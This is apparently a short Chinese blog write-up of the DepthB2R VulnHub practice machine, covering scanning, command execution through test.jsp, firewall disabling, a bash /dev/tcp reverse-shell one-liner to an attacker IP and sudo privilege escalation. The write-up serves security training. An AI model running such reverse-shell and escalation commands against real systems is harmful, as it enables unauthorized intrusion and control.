DepthB2R靶机

最新推荐文章于 2025-12-04 22:20:49 发布
原创 最新推荐文章于 2025-12-04 22:20:49 发布 · 312 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记

主机发现,端口目录扫描

访问主页

尝试弱口令登录时,发现了一组账号密码,但并没有登录成功

访问扫描到的接口,提示输入 ls -l /tmp,并尝试查看其他目录,和其他系统命令

ps -aux发现有ssh但nmap却没有扫描到,原来在/etc有防火墙

关闭防火墙,并反弹shell,

ssh bill@localhost bash -i >& /dev/tcp/192.168.81.129/9999 0>&1

kali开启监听

普通用户,开始提权

提权

sudo -l,查看当前权限,显示all

sudo su 提权成功

陽陽yy
关注
DepthB2R靶机打靶记录
qq_64703089的博客
10-08 588
DepthB2R靶机
OWASP靶机、安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
DepthB2R靶机渗透测试
weixin_58786230的博客
08-03 345
【代码】DepthB2R靶机渗透测试。
depthb2r靶机
weixin_73074638的博客
08-06 225
访问robots.txt,得知该目标为 apche /tomact 8.0.38 ubuntu操作系统上网查找nday,未发现可利用的。执行ls -l/tmp。访问test.jsp。
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 527
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
DepthB2R靶机渗透
weixin_67832625的博客
10-13 544
​。
DepthB2R靶机复现
weixin_52956666的博客
08-02 352
访问192.168.112.149:8080。靶机IP为192.168.112.149。输入ls -l /home查看用户。发现失败,感觉像是ssh服务被关闭。这个靶机比较友好,不需要进行设置。输入ls -l发现存在命令执行。sudo -l查看免密操作。拼接/test.jsp。尝试进行反弹shell。sudo su直接提权。在kali上开启监听。
Vulhub DepthB2R靶机详解
weixin_62457642的博客
10-14 483
靶机DepthB2R速刷
VulnHub DepthB2R 入门靶机渗透
2401_83378606的博客
09-26 614
这里是个登陆界面,从首页看出是个tomcat搭建,从网上看看它的默认密码。既然可以执行命令,那有可能存在命令执行,看看根目录试试。其他都是404,进去看下url也就是之前探测出的目录。尝试看看刚个功能点,这里有四个跳转链接除了这个。尝试访问看看,应该是个tomcat搭建的网站。既然存在命令执行,那就直接反弹shell试试。在/etc 下看看了确实存在,那就尝试关闭。一看吓一跳,所有操作都可以执行root权限。没什么反应,想想问题,先查看了一下进程。可能是防火墙拦截了,那就尝试关闭防火墙。
【vulnhub】DepthB2R 打靶渗透
weixin_62162207的博客
08-07 324
DepthB2R 打靶渗透
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
新手适用的Web渗透测试靶机实践
06-17
Web渗透测试靶机是一种专为网络安全新手设计的学习平台,它模拟真实的Web应用程序环境,让学习者能够在安全可控的条件下练习渗透测试技术。这种靶机通常包含多种存在不同安全漏洞的Web应用,学习者可以通过查找和...
CentOS7 + 芯片验证工具环境部署全笔记:从虚拟机到 VCS/Verdi 实战
m0_46663240的博客
12-03 795
本文提供从CentOS7虚拟机搭建到芯片验证工具部署的完整指南。首先介绍VMware虚拟机安装CentOS7的详细步骤,包括磁盘分区、用户设置等关键配置。随后讲解网络连接设置、VNC远程服务部署及防火墙配置,实现可视化远程操作。最后涵盖vim编辑器和Shell环境的个性化优化,为后续芯片验证工具安装做好准备。文中包含各环节的常见问题解决方案和实用配置代码,适合芯片验证初学者和Linux运维人员参考使用。
2025-11-27-LeetCode刷题笔记-3381-长度可被K整除的子数组的最大元素和
tkhhhhh的博客
12-04 382
摘要: LeetCode 3381题要求找出长度能被k整除的子数组的最大和。解题关键在于结合前缀和与模运算技巧:通过计算前缀和数组,按位置模k分类,维护每类余数的最小前缀和。这样可以在O(n)时间内计算每个位置结尾的子数组最大和,只需一次遍历即可得到结果。算法空间复杂度为O(k)。提供了Python、Go和C++的实现代码,并讨论了负数处理等边界情况。核心思路是利用同余性质优化计算,避免暴力枚举。
学习笔记二十三:支持向量机-间隔与支持向量
dengdaijc的专栏
12-02 733
本文介绍了支持向量机(SVM)的基本原理。SVM通过在样本空间中寻找最优划分超平面来实现分类,其核心思想是最大化分类间隔以提高泛化能力。关键概念包括:划分超平面的数学表示(由法向量和位移项定义)、支持向量(决定超平面位置的最近样本点)以及间隔(反映分类置信度)。SVM的基本型是一个凸二次规划问题,通过最小化法向量范数平方来最大化间隔,同时满足所有样本正确分类的约束条件。该方法具有理论严谨、模型稀疏、全局最优等优势,是经典的分类学习算法。
无人机数据链路聚合入门笔记
持之以恒
12-03 356
多链路并行传输,提升带宽和可靠性动态链路管理,适应复杂环境低延迟、高可靠的数据传输。
LinuxC语言并发程序笔记补充
最新发布
chenzhou__的博客
12-04 659
锁除了互斥锁,还有一个读写锁,进程通信还有对互斥锁优化的条件变量和死锁的概念。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值